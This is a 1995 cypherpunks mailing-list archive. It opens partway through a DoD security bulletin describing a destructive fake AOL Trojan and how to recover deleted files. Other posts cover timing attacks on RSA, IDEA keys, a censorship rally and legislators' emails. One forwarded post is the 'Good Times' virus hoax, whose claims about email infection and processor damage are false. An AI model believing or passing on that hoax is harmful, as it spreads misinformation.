     and improved interface to the AOL online service.  The INSTALL.EXE 
     program is a self-extracting ZIP archive.  When you run the install 
     program, it extracts 18 files onto your hard drive:
     MACROS.DRV
     VIDEO.DRV
     INSTALL.BAT
     ADRIVE.RPT
     SUSPEND.DRV
     ANNOY.COM
     MACRO.COM
     SP-NET.COM
     SP-WIN.COM
     MEMBRINF.COM
     DEVICE.COM
     TEXTMAP.COM
     HOST.COM
     REP.COM
     EMS2EXT.SYS
     EMS.COM
     EMS.SYS
     README.TXT
     
     The file list includes another README.TXT file.  If you examine the 
     new README.TXT file, it starts out with "Ever wanted the Powers of 
     a Guide" and continues with some crude language.  The README.TXT 
     file indicates that the included program is a guide program that 
     can be used to kick other people off of AOL.  If you stop at this 
     point and do nothing but examine the unzipped files with the TYPE 
     command, your machine will not be damaged.  The following three 
     files contain the Trojan program: 
     MACROS.DRV
     VIDEO.DRV
     INSTALL.BAT
     
     The rest of the files included in the archive appear to have been 
     chosen at random and included to simply fill up the archive and 
     make it look official.  The Trojan program is started by running 
     the INSTALL.BAT file.  The INSTALL.BAT file is a simple batch 
     file that renames the VIDEO.DRV file to VIRUS.BAT and then runs 
     it.  VIDEO.DRV is an amateurish DOS batch file that starts 
     deleting the contents of several critical directories on your C: 
     drive, including:
     c:\
     c:\dos
     c:\windows
     c:\windows\system
     c:\qemm
     c:\stacker
     c:\norton
     
     It also deletes the contents of several other directories, including 
     those for several online services and games, such as:
     c:\aol20
     c:\prodigy
     c:\aol25
     c:\mmp169
     c:\cserve
     c:\doom
     c:\wolf3d
     
     When the batch file completes, it prints a crude message on the 
     screen and attempts to run a program named DoomDay.EXE.  Bugs in the 
     batch file prevent the DOOMDAY.EXE program from running.  Other bugs 
     in the file cause it to delete itself if it is run from any drive but 
     the C: drive.
     
     IMPACT: When the INSTALL.EXE program is executed, files on the
     users c: drive are deleted.
     
     RECOMMENDED SOLUTIONS: NOTE: Do not copy any files onto your hard 
     disk before trying to recover your hard drive.  The files are deleted 
     with the DOS del command, and can be recovered with the DOS undelete 
     command.  The files are still on your disk, only the directory 
     entries have been removed.  If you copy any new files onto your hard 
     disk, they will likely be written over the deleted files, making it
     impossible to recover the deleted files.
     
     If you have delete protection installed on your system, recovery will 
     be relatively easy.  If not, the DOS undelete command can be used, 
     but you will have to supply the first letter of each file name as it 
     is recovered.  In many cases, you will probably want to restore the 
     directories by reinstalling them from the original installation disks, 
     but do that last.  You must recover any unreplaceable files first 
     using undelete and then replace any others by copying or reinstalling 
     them from the distribution disks.
     
     To recover the system:
     (1) Boot the system with a clean, locked floppy containing the 
     recovery program for the recovery files you have installed, or the 
     DOS UNDELETE.EXE program if you do not have recovery files installed.
     
     (2) Type the VIRUS.BAT file to get a list of the directories the 
     Trojan tried to delete.  Ignore any directories that don't exist on 
     your
     machine.
     
     (3) Run the recovery program and recover your files. You may have to 
     help it find the recovery files, such as MIRROR, which will be in the 
     root directory.  You may have to recover the MIRROR file first and 
     then use it to recover the other files.
     
     If you are using only the DOS undelete command, type:
     
        undelete directory
     
     where directory is the name of the directory to examine. To undelete 
     the files in the dos directory, use:
     
        undelete c:\dos
     
     The undelete program will present you with a list of deleted files 
     with the first letter replaced with a question mark.  Without delete 
     protection, you will have to supply this letter in order to undelete 
     the file.
     
     (4) After you have restored as many files as you want or can using 
     the UNDELETE command, replace any others by reinstalling them using 
     the original installation disks.
     
     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
     
     ASSIST would like to thank the Department of Energy CIAC for 
     information contained in this bulletin.
     
     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
     
     ASSIST is an element of the Defense Information Systems Agency 
     (DISA), and provides service to the entire DoD community. 
     Constituents of the DoD with questions about ASSIST or computer 
     security issues, can contact ASSIST using one of the methods listed 
     below.  Non-DoD organizations/institutions, contact the Forum of 
     Incident Response and Security Teams (FIRST) representative.  To 
     obtain a list of FIRST member organizations and their constituencies 
     send an email to docserver@first.org with an empty "subject" line 
     and a message body containing the line "send first-contacts".
     
     ASSIST Information Resources: To be included in the distribution
     list for the ASSIST bulletins, send your Milnet (Internet) e-mail
     address to assist-request@assist.mil.  Back issues of ASSIST 
     bulletins, and other security related information, are available
     from the ASSIST BBS at 703-607-4710, 327-4710, and through anonymous 
     FTP from assist.mil (IP address 199.211.123.11).  Note: assist.mil 
     will only accept anonymous FTP connections from Milnet addresses 
     that are registered with the NIC or DNS.  If your system is not 
     registered, you must provide your MILNET IP address to ASSIST before 
     access can be provided.
      
     ASSIST Contact Information:
     PHONE: 800-357-4231, COMM 703-607-4700, DSN 327-4700.
     ELECTRONIC MAIL: assist@assist.mil.
     ASSIST BBS: COMM 703-607-4710, DSN 327-4710, leave a message for
     the "sysop".  
     FAX: COMM 703-607-4735, DSN 607-4735
     
     ASSIST uses Pretty Good Privacy (PGP) 2.6.2 as the digital 
     signature mechanism for bulletins.   PGP 2.6.2 incorporates the 
     RSAREF(tm) Cryptographic Toolkit under license from RSA Data 
     Security, Inc.  A copy of that license is available via anonymous 
     FTP from net-dist.mit.edu (IP 18.72.0.3) in the file 
     /pub/PGP/rsalicen.txt, and through the world wide web from
     http://net-dist.mit.edu/pgp.html.  In accordance with the terms 
     of that license,  PGP 2.6.2 may be used for non-commercial 
     purposes only.  Instructions for downloading the PGP 2.6.2 
     software can also be obtained from net-dist.mit.edu in the 
     pub/PGP/README file.  PGP 2.6.2 and RSAREF may be subject to the 
     export control laws of the United States of America as 
     implemented by the United States Department of State Office of 
     Defense Trade Controls.  The PGP signature information will be 
     attached to the end of ASSIST bulletins.
       
     Reference herein to any specific commercial product, process, or
     service by trade name, trademark manufacturer, or otherwise, does
     not constitute or imply its endorsement, recommendation, or
     favoring by ASSIST.  The views and opinions of authors expressed
     herein shall not be used for advertising or product endorsement
     purposes. 
     
     - -----BEGIN PGP PUBLIC KEY BLOCK-----
     Version: 2.6
     
     mQCNAi4uZ40AAAEEAM1uraimCNeh5PtzX7KoGxC2u8uMTdl8V5sujk3MHbWvCuOM
     W0FqDy5s9iwfQLZWzJ7cbM6L0mNOj8eJGoz7TqGKZDDRFlKAwg0x8joleZLC2gXw
     FVdF/g6Mdv7ok7heoa+Y//YMeADnsSrmzqLCnhFbKYffww3EbdH6sbnW3Io9AAUR
     tB9BU1NJU1QgVGVhbSA8YXNzaXN0QGFzc2lzdC5taWw+iQCVAwUQMJVF1JtBJ/Qs
     yeedAQFnqgQAp1rw7ONT41Mr3gHGs2aVpEwgOH6SeJ9sHZxUp4dJu+ogRMFrqdC+
     +NBfzitzj9m1udFVDHpwsGawbv6wg43DDAKaTgIETCHYXa/OM5/9FCS3xJwC99Gb
     V1iOm8S/Q9FcJruKID9DG2WUJp2yPj+CjTuBQeLjGkqGjuSOR1TNXQiJAJUDBRAw
     lUPuYKf6jFkmJQkBAWg5A/9ykgo2ULWUsSzZjRkO9yPZUPAlpfH7ReaHwkapK69F
     fBzqwwQ8Gig1mL+qgmOHS8Zv+OAT491sWWsECN+dfpopFdsgS4Sec19ZjcMyhL1c
     BVIS9Cmbjetb6Kvfc39AMr0MRCrUlOkUd4qScjHysHFYRAwCl3STRjprNnUPKQbn
     f4kAlQMFEDB482bk8movIjSrbQEB/VgD/iap/CAb1jq8wMA3QleU8d6/QUqoPzgp
     jRhP0wP7K2GLVUV0d5sP4EptmzejqViZvlzt6ufnI1bML0Yt2U5loAeblnh714RX
     JcOmyAah6niiJSKuhCsYUzW6f3EBzXBn5tcu3GP35h+1VQunCQCMICCfnZ0r8Wcv
     EdwE9LxPYdueiQCVAwUQMHOjMwJPhGsUbeKNAQGOagQAgT5p6CwrIPpi+12yJ170
     ekc3MPp8z0aNbvdCQWXTK6qtq1LmS65VeH0RE5xRponsgbWp+5JBvD22v0eGuSg7
     7bnHT1HPXazPERAp8sw1zTERs7drMQE+JhHYylh3orKzHNf5EjFx10vwEXdfvGSc
     sP3Vpcx2xu0lUYHp5oHtPFiJAJUDBRAwar4DFKHh5Qavqe0BAeQqA/4xd0tdq9yF
     eUYrd1+ZriayzfSjCcIUlCDH1i7vXw1kiHkg2YpOoZLD9k+zNkbOyBs/r570fGHu
     A23SvUcUfaBUijT1jf9YGU5MQMdpx3p5qqI4kJ0GWUNySZNtaFy0qWNH8Z8NsNp3
     FWllVeisye0qe96aoizW0dAyUymlM6YYn4kAlQMFEDBqqvga2zTcAviMgQEBN8wE
     AIu7O/Of4c1OvMc5tti4+gcyCVw41+fLjxQFB5EtkoW8Js6XhCsv3GcmzgCZw3g8
     Sux7wxGe+lspZNV9rvv+JkDBWkA9O5HyOdmdv5JZM1UH41NettZM9Yw7kUtO7lAT
     aOb4ybHlqrBwJ8/+Lig7r7PwTL847JyGa3g229pGG/uEiQCVAwUQMGpTK+glSuMP
     TJd1AQE8KQP8Cu+FYuagNoBRllMIQryT9+0ngLRxJJTcTgIbLX4OPwa27JuXCukG
     kUIXRWFCqkRqkM/7ImZXeuUL4PmAX07f9ygGH7BUyqefhIWkxWFDaGHJVlg3l/pS
     Wh7NnC+nU6DUJNSzfwYStCABNptOcMiYaT1fY0+DkWpIgJVRTptquOWJAJUCBRAw
     aHX+IlGW2WZtAFEBATkXA/40QTxVP/x3aJDgC11cvFhwT7M+qJvhGSTRJOtrFz8i
     soZzihMeaQ8zLiu73dDlFz2E4f0+ettxsDcgFJADNmZ5H7WkPlf9gBUBne4KP2Y6
     yIjOCMwd6T7HGm/ErF88DIJ2wn8irhzVRnBBWhnmQfSzr5a7mkjlA6GzAlFucGp3
     eokAlQMFEDBpzIC58yc3bMt0GQEBgd4EAI0mE/5wXSWuBNApkALLjPAchBdeC4Kl
     YF4hQkfY/4YddeIasgTmINKOc5gJWgTHxPI2xKxjTAQhIZlOxuDyXWnBuK+x2hr4
     iCh5unEIH+qaqdipGwWjFq0IZEmOOJaBRxlVt2hrmY6nRMpekitFLw8dhWHgI968
     WVhJpWfBg+MhiQCVAwUQMGnMcmJl+kgHVnRVAQF+nQP/XK4xmIx1SmjoN9D+vNRY
     PSiKz8KEzh1Y2/5QTYA7iES8QXC4i/8HOWK7lyoL6FmWGxKYpU8isQ+DJpk0A4N0
     U04JexpyFa0EeM/wsfp0YvAWesSVhV5UkDQU6hSC0U8rS1j/qtnSLZ4wXpapPSBh
     82daDlxAQCVMzDoQYQZkMi+JAJUDBRAwacftBCZ9eY4KSdEBAbKGA/0VHArALL6v
     d0a0x7sn4o60Bk2fFzuaCBNTNzb11OOtuu47KMOZLwrl2jv+32ysIVEOXx+puhXP
     nQAgRrH0LGKV5FOY3B98AHuV+woOmfVjM2T3xB4Bs52Dz+HIIIhaWzzy3955tlp/
     6UyvZnD0QFLS/bre/Pog1Lgl0pxonmILhYkAlQIFEDBpJpXAx/wW8A8EIQEBPVoD
     /jwgG+7ZrWrb8/dqe6IZhSk8rq0JIHhSA2Hz1T7PhRvyDiquBJ3ulTeaX3BvuWqF
     bMuLJ4CTqXw9dexDehEnhGlxYycSXVzy8a34pLnmldii8oNvI1bLWMgd4HdM/PPZ
     GOgHmSIGrXMChkbddt9AoszDI0Whlbe9+wn6AeZVrJVaiQCVAgUQMGkkL2yh0IcG
     ee2RAQHrTgQAvBRce0S9yBvI/ufC/1jhE3LuUoA3YDdA8+UQ+UekaslZzOEgPs4K
     Za/nM9Y2vaRYscyzyIg8FGTzCdJQ2be9HZjSkB2xQuakeq88tlV32/cLcQSC8Zrw
     xsnPWujbIcWYg7B0hv8cCovef/w4kC9GyhjhIzPIsQ/Cr7/TYzheK12JAJUDBRAw
     Z/38o2xF3nu86kkBARanA/0XO4HBo6pT2xNCdQ7AW9UrvmTCiYUb0XVY7qCnkaPp
     Sn1KjsK2nGueDMGUBzvx9zWZ0xHAS+BSNkoM61gb9455KcbDwRqw6+47O/WuX1w9
     fh7egjTY0kqN6YsP/vtirOuP+Krh19w/s6cDxbEBNbJIiZofRDFRRsZcZ8E2mLCP
     UIkAlQMFEDBn/EY7f8e8znZrHwEBxQwD/jP+CiwO3Nk45M5Ei++TZzdp7ak82hum
     XxVXplV2G4w8DN86pfl3IV/XvU67FQXg4NKJr+wm3JknDtlKZTE5g+aKkOYK6Fqt
     w3FjTd6PTDz11YRruCsdvBeYwMcHPe5XzIhgkwkMXX2Mp99q9LGKfV3087do2LNr
     V/2S/atn6IuqiQCVAwUQMGW6OliXq3zaXLJBAQFLwgP/bQ1C/Ph54RlRqw9rovJo
     SXp5wvQAfVqqnkL5nIIIK2uGputcmhMP8RqYKuRv4xaezkCDTeIE/P0327Ajc4//
     ca4SZCojxfqtrhw3EkfZtvFLJh1tsvAkqZkgHmjJxwA+lY78lQ1ncBZ99dePpuHu
     MBQew3769SkEA8kk/s5XiYqJAJUDBRAvXHHu0fqxudbcij0BAQFjA/0W8glucqO0
     wtSPyCF3qGimFLHxZmd9Cw6Zlf8Ftfy8rPVrkGQGfioA29b64oZ1SUTwsswSbU8P
     n0KKFxvc6hYM5TzMg4gSu+vLh6pr4vMRdXyecF16z4BrUwIwZLP4rc5o/vyVDskI
     ahj1NdNYh6V8B0FUEbhVBxJBGfy2NF0bZ7QoQVNTSVNUIFRlYW0gPGFzc2lzdEBh
     c3Npc3QuaW1zLmRpc2EubWlsPokAlQIFEC45Ys3KbyuD/AwC1QEBKPED/2dwnN+/
     OE2iHhvGwv3jZtsm6cH+GVkpNpc0w0vQOKvVwUnLwuETSv+eryz9Fl7nL0U2tv/5
     V81dXqqc5C7EvOQW1Dt9RBSjEOundYrOzsfELIMrwh1iJXsIxG7g7iil0HeKzxsQ
     E/nBFwJbgP6SQaYF4wy7TPuXw+IVVddp0p1riQCVAgUQLi5x6IdGPdIwvm+pAQFN
     EwP+Ml0i+yurXH1ZvQApz+HKwqLrRTNsNdHu2CsQ/OdGo4Vq4eqyPTvrI1OVjm6o
     jye7GR3RMPygEcz0oox/+YfB5cmGugpZLFsWLspswrFGGCXLXY3Bq7mpH14GENU5
     JMlHzazeRvdDbkSv700Xu25JshjWIzfTY2nNUNfFlRefQoY=
     =8gi/
     - -----END PGP PUBLIC KEY BLOCK-----
     
     -----BEGIN PGP SIGNATURE-----
     Version: 2.6
     
     iQCVAwUBMMNldNH6sbnW3Io9AQEojQQAoRB5w3+MigtmYkosgh94ttXFwt77VJmC
     n8b5SVZgD4pmXss12ZLLvSsXC8/+4Kp4IyHKyvie/nu7mmEZN4RcDy2N3IGa6Rmk
     ydVqJ9BvCSxNUNwwdxOMPj/Cu5Pmv1ssoIDdXVXMn11n3Ti97HiElj3VJP7DlH8w
     ZNoFm4DydgM=
     =MKi5
     -----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WheatonB@603cs.croughton.af.mil
Date: Wed, 13 Dec 1995 03:24:21 +0800
To: CYPHERPUNKS@toad.com
Subject: F. Y. I.
Message-ID: <9511128188.AA818815409@603cs.croughton.af.mil>
MIME-Version: 1.0
Content-Type: text/plain


     To all.  This is something I received from a fellow Internet user in 
     the States.  I don't know where he got this info, but I thought we may 
     all benefit from this warning.
     
     SrA Lounsbury sends...

______________________________ Forward Header __________________________________
         
         Just in case you missed this info....
     
>>>>>>SUBJECT:  VIRUSES--IMPORTANT PLEASE READ IMMEDIATELY 
>>>>>>
>>>>>>      There is a computer virus that is being sent across the 
>>>>>>Internet.   If you receive an e-mail message with the subject 
>>>>>>line "Good  Times",   DO NOT  read  the  message,  DELETE  it 
>>>>>>immediately.  Please read the messages below.  Some miscreant 
>>>>>>is sending  e-mail under  the title "Good Times" nation wide, 
>>>>>>if you  get anything like this, DON'T DOWN LOAD THE FILE!  It 
>>>>>>has a  virus that  rewrites  your  hard  drive,  obliterating 
>>>>>>anything on  it.  Please be careful and forward this mail to 
>>>>>>anyone you care about.
>>>>>>
>>>>>>************************************************************* 
>>>>>>
>>>>>>WARNING!!!!!!!  INTERNET VIRUS 
>>>>>>
>>>>>>      The FCC  released a warning last Wednesday concerning a 
>>>>>>matter of  major  importance  to  any  regular  user  of  the 
>>>>>>Internet.     Apparently  a   new  computer  virus  has  been 
>>>>>>engineered by  a user of AMERICA ON LINE that is unparalleled 
>>>>>>in its destructive capability.  Other more well-known viruses 
>>>>>>such as  "Stoned",  "Airwolf"  and  "Michaelangelo"  pale  in 
>>>>>>comparison to  the prospects  of this  newest creation  by  a 
>>>>>>warped mentality.   What makes this virus so terrifying, said 
>>>>>>the FCC,  is the  fact that  no program needs to be exchanged 
>>>>>>for a  new computer to be infected.  It can be spread through 
>>>>>>the existing e-mail systems of the Internet.  Once a computer 
>>>>>>is infected,  one of  several things  can  happen.    If  the 
>>>>>>computer contains  a hard  drive, that  will most  likely be 
>>>>>>destroyed.   If the  program is  not stopped,  the computer's 
>>>>>>processor will be placed in an nth-complexity infinite binary 
>>>>>>loop -which can severely damage the processor if left running 
>>>>>>that way too long.
>>>>>>
>>>>>>      Unfortunately, most  novice  computer  users  will  not 
>>>>>>realize what is happening until it is far too late.  Luckily, 
>>>>>>there is one sure means of detecting what is now known as the 
>>>>>>"Good Times"  virus.   It always travels to new computers the 
>>>>>>same way  in a  text email  message  with  the  subject  line 
>>>>>>reading "Good  Times".   Avoiding infection  is easy once the 
>>>>>>file has been received- not reading it!    The act of loading 
>>>>>>the file into the mail server's ASCII buffer causes the "Good 
>>>>>>Times" mainline program to initialize and execute.
>>>>>>
>>>>>>    The program is highly intelligent- it will send copies of 
>>>>>>itself to  everyone whose  e-mail address  is contained  in a 
>>>>>>receive-mail file or a sent-mail file, if it can find one. It 
>>>>>>will then proceed to trash the computer it is running on. The 
>>>>>>bottom line  here is - if you receive a file with the subject 
>>>>>>line "Good  Times", delete  it immediately!   Do not read it" 
>>>>>>Rest assured  that whoever's  name was on the "From" line was 
>>>>>>surely struck  by the  virus.   Warn your  friends and  local 
>>>>>>system users  of this newest threat to the Internet! It could 
>>>>>>save them a lot of time and money.
     
_________________________________________________________ 
Category:
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 14 Dec 1995 00:10:20 +0800
To: cypherpunks@toad.com
Subject: SmartGate
Message-ID: <01HYQ7HJ7XTC8Y4YHK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	This looks like they're using Diffie-Hellman. Does anyone know anything
further?
	-Allen

---------------------------
>
   Reuters New Media
   
   _ Tuesday December 12 6:33 AM EST _
   
V-One Unveils Internet Security Technology

   
   
   ROCKVILLE, Md. (Reuter) - V-One Corp. says it has introduced security
   technology called SmartGate that enables companies to build a secure
   system to conduct transactions on the Internet computer network.
   
   SmartGate is transaction-based software that uses encryption to ensure
   protection over an open network, the privately held company said
   Monday.
   
   Encryption scrambles the data and in the SmartGate system, a key to
   decode the data is generated that is unique to a specific transaction
   session.
   
   V-One, which stands for Virtual Open Network Environment, said
   SmartGate is available now directly from the Rockville, Md.-based
   company.
   
   It said SmartGate can be purchased in either a hardware-software or
   software-only form. The SmartGate server retails for $9,995 and the
   software-only version is $4,995. A server is computer that manages the
   flow of data in a network. SmartGate licenses are priced at $79, with
   reductions offered for volume purchases.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Wed, 13 Dec 1995 10:29:06 +0800
To: cypherpunks@toad.com
Subject: Re: Wanted: email for Calif senators & representatives
In-Reply-To: <9511128188.AA818800342@snail.rsa.com>
Message-ID: <4akv20$965@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


"baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> writes:

>        Can someone send me, or the list, the email addresses for
>the California senators and representatives?

You can access the entire house through http://www.house.gov/Welcome.html.
http://policy.net/ has a number of good references to legislators; you may
be able to find your senator through it.
-- 
"I tracked down why mail to you wasn't getting thru.  When it comes to
getting someone to fix something, often it's not what you know, or who
you know, but who you just might embarass in front of their customers.
It's now fixed."      	-- me, in email to a friend




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 13 Dec 1995 11:13:07 +0800
To: cypherpunks@toad.com
Subject: Re: Time-based cryptanalysis: How to defeat it?
Message-ID: <199512130144.RAA08950@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: futplex@pseudonym.com (Futplex)
> I don't understand why Kocher's point is correct. For example, why do the
> times diverge with the following modification of the modexp algorithm on
> pg.2 of the abstract ?
> 
> 	Algorithm to compute R = y^x mod n:
> 		Let R_0 = 1.
> 		Let y_0 = y.
> 		For i = 0 upto (bits_in_x - 1):
> 			Let M = (R_i * y_i) mod n.
> 			Let R_(i+1) = (bit i of x) * M  +
> 					(1 - (bit i of x)) * R_i.
> 			Let y_(i+1) = (y_i)^2 mod n.
> 		End.

I posted a similar idea on sci.crypt, but later I realized that Paul Kocher
is right.

Your algorithm works OK for the first iteration.  The amount of work is
pretty much constant regardless of whether bit 0 of x is 0 or 1.
However, at the end of that iteration R_1 will have one of two
different values depending on that bit 0 value.  And, the attacker can
know these two values, and if he controls y he can even choose them
(they will be either y or 1).

Now, on the next iteration, the time it takes will be different
depending on bit 0 of x.  It won't depend on the bit 1 value, but
different bit 0 values will cause R_1 to be different.  So the time of
this iteration will depend on the value of the bit used in the previous
iteration, and likewise for the following iterations.

If the attacker can choose y, he can arrange that the two different R_1
values will take different times on average for the rest of the
calculation.  So he finds out bit 0 as before, and from there he can go
on and find the other bits.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Wed, 13 Dec 1995 09:51:33 +0800
To: cypherpunks@toad.com
Subject: IDEA encryption
Message-ID: <Pine.A32.3.91.951212174132.26320B-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



The copy of the source for idea (unix) that I have specify's a user key 
length of 8 bytes, but allows this to be increased to something larger. 
Will increasing the user keylength improve the overall security? 

Also, is it worth hashing the user key first, then using the hashed key 
as the key for encryption and decryption? Or am I wasting my time? 

Last thing -- how secure is unix "rm"?  If something is rm'd, is it 
really really gone? 

Thnks..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Wed, 13 Dec 1995 10:26:50 +0800
To: A&amp;SUser@cctr.umkc.edu
Subject: Re: Pornographic stories
Message-ID: <9512122251.AA03113@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


A&SUser writes:
>Hey, I'm Molly, and I know I sent you a bit of mail a couple of days ago. 
> I'm not sure how you do your Pornographic server, so I'll just ask 
>again.  I know I would be VERY gratful if you could send me any XXX 
>stories, I love to read them.  I could reward you over the net somehow 
>I'm sure.  
>my adress is mphillips@cctr.umkc.edu
>
>Thanks....I'll be waiting.
>
What the hell are you talking about??  This is the cypherpunks mailing list!!
Jeses, try alt.sex.stories. :P

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 13 Dec 1995 12:18:22 +0800
To: cypherpunks@toad.com
Subject: Thursday noon, SF: Meatspace rally against cyberspace censorship
Message-ID: <9512130233.AA20672@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday's rally was canceled on account of rain.  There is now a backup
location in case of rain on Thursday.  Check the web page before you leave,
or come to South Park, and the backup location will be close by.  See you
there!     -- John

Date: Tue, 12 Dec 1995 18:15:44 -0800 (PST)
From: protest@wired.com (--Todd Lappin-->)
Subject: SF RALLY -- THURSDAY

This is an updated announcement for Thursday's Rally Against Censorship,
with the current list of speakers.  The rally will take place rain or
shine, so hope for the best, bring an umbrella, and spread the word.
Thanks!


                *** NETIZENS!! RALLY AGAINST CENSORSHIP ***

                         Thursday, December 14, 1995
                       at South Park, 12:00 - 1:00 PM
                          San Francisco, California

                           --  Rain or Shine!  --

     **PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST **


Amendment I: "Congress shall make no law ... abridging the freedom of
speech, or of the press; or the right of the people peaceably to assemble."


     **PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST **

It's like illiterates telling you what to read. On December 6 members of
the House Conference Committee on Telecommunications Reform approved a
proposal to censor free speech in cyberspace. If the measures are adopted,
the Net and online media will become the most heavily regulated media in
the United States. They *will not* enjoy the First Amendment freedoms now
afforded to print media. Instead, online publishers and users will be held
to a vague and patently un-Constitutional "indecency" standard. "Violators"
will be subject to fines of up to $100,000 and prison terms of up to five
years.

In response, ALL members of the Bay Area media, online, Internet, new
media, and telecommunications communities are invited to participate in a
protest rally to express our outrage that the politicians in Congress
(which is not even connected to the Internet!) are attempting to destroy
our First Amendment rights in cyberspace, and directly attack our
livelihoods.

Help stop the demagogues in Washington! There is nothing "decent" about
denying free speech to us, our children, and our children's children.
Preserve our Constitutional rights! Join us!

WHEN: Thursday, December 14, 1995  12:00 - 1:00 PM

WHERE: South Park (between 2nd and 3rd, Bryant and Brannan) San Francisco.
       (In the event of rain, an indoor location will be announced)

SPEAKERS:Mike Godwin, EFF; John Gilmore, co-founder, EFF; Denise Caruso,
New York Times columnist; Jim Warren, online activist; Howard Rheingold,
author; Dave Winer, essayist and software developer; Audrie Krause,
Executive Director, CPSR; Jonathan Steuer, CEO, Cyborganic Corp; Michael
Goldberg, Publisher, Addicted To Noise.

BRING: Attention-grabbing posters, signs, and banners that demonstrate your
committment to free speech and expression, and your feelings about
Congress.

FOR UPDATED INFORMATION: http://www.hotwired.com/staff/digaman

(Although this event is being organized in the offices of Wired magazine
and HotWired, we are *actively* seeking participation and support from all
members of the local community. Please forward this message to anyone you
think should attend, and to all relevant news groups.)

CONTACT: Todd Lappin -- 415-222-6241 -- protest@wired.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjm@easynet.co.uk (Terence Joseph Mallon)
Date: Wed, 13 Dec 1995 02:38:33 +0800
To: cypherpunks@toad.com
Subject: YOUR ADVICE AND HELP PLEASE......
Message-ID: <v01530500acf3760e23db@[194.154.96.141]>
MIME-Version: 1.0
Content-Type: text/plain


Dear fellow Cypherpunks,

I write to ask for your help.

In the new year I am to begin a three level internet course - beginners,
intermediate and advanced. Both privacy and security have been and are an
interest of mine  and unlike many courses which I have approached and
conversed with I do not see these areas as some remote aspect of the
advanced level - I see them as constituents of each level, through out the
levels, and certainly from the beginning - as I have lurked here for the
past while as a subscriber and prior that from afar I believe we all would
agree with this.

Yes, I am a virgin cypherpunk but not a virgin to both privacy and security
as growing up in Northern Ireland I have seen them both in abundance and at
other times lacking - the official / the unofficial - how they both took
away life....

What I write to ask for is some pointers to direct me and if possible some
personal comments in regards to these aspects. I personally use PGP but am
ignorant to where this program is in the broader field of cryptography and
what other programs are which have been mentioned on the mailing list.

Excuse my lack of knowledge in technical terms but I am acute to them in
the realm of the street. THE STREETS HAVE CHANGED TO CABLES AND THE
BUILDINGS HAVE BECOME CPUs - WE ARE ALL
GRAPHICS/TEXT/SOUNDS/VIDEO...........LANGUAGE.

Can you please help me, as this information shall be passed on to others to
make them aware and to help them - as it has helped you all, as it is
helping me....

Thanking you all, in anticipation of hearing from you and wishing all a
very happy as well as a safe Xmas and a lucky new year.

Yours faithfully,

Terence.


"Irish eyes are smiling, I miss the emerald isle."

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzCsvtYAAAEEANjIsO3Q0cSdEgYifAiA5+aUEVSBFFZTZIpqQXbgXxExsrjk
bFiJ6haaWaD60KPjxH8QJ8PHr9x2tk2K1ktpbcL2+YjPHd+fJzqgz3llu2FV1Xu/
k1C7SWA5G8Do66I0MrQD3/jbAI2zp/0LnVoiI7LWCvPPKoxYCiHdIQ/n5PcJABEB
AAG0JVRlcmVuY2UgSi4gTWFsbG9uIDx0am1AZWFzeW5ldC5jby51az6JAJUDBRAw
uju1Id0hD+fk9wkBAXuUBACjGEmj3AO/rSUD0WRRHdYjDfR8L1FvcV0J/ZNwp7WJ
2cmHvtecLaOlTVWulRhVI6suUSwwzBYZFWmHJA7lR67gLZN8xqWyo/jWPVLDxAte
pdC7ruZI1ZrFc90uPpymnVdC00gwgcG3F4RDQ9B1uY+4KiNG//fULwT6xUVzthak
qA==
=QN61
-----END PGP PUBLIC KEY BLOCK-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Wed, 13 Dec 1995 11:01:38 +0800
To: cypherpunks@toad.com
Subject: Re: Wanted: email for Calif senators & representatives
In-Reply-To: <9511128188.AA818800342@snail.rsa.com>
Message-ID: <Pine.LNX.3.91.951212194529.200A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Dec 1995, baldwin wrote:

>         Can someone send me, or the list, the email addresses for
> the California senators and representatives?
>                 --Bob Baldwin
> 
> 
> 

Here's the list:  (Note: I do not know if this is complete)

Barabara Boxer       senator@boxer.senate.gov
Dianne Feinstein     senator@feinstein.senate.gov
Bill Baker           BBAKER@hr.house.gov
George Brown         TALK2GEB@hr.house.gov
Anna Eshoo           ANNAGRAM@hr.house.gov
Sam Farr             SAMFARR@hr.house.gov
Vic Fazio            DCAUCUS@hr.house.gov
Jane Harman          JHARMAN@hr.house.gov
Tom Lantos           TALK2TOM@hr.house.gov
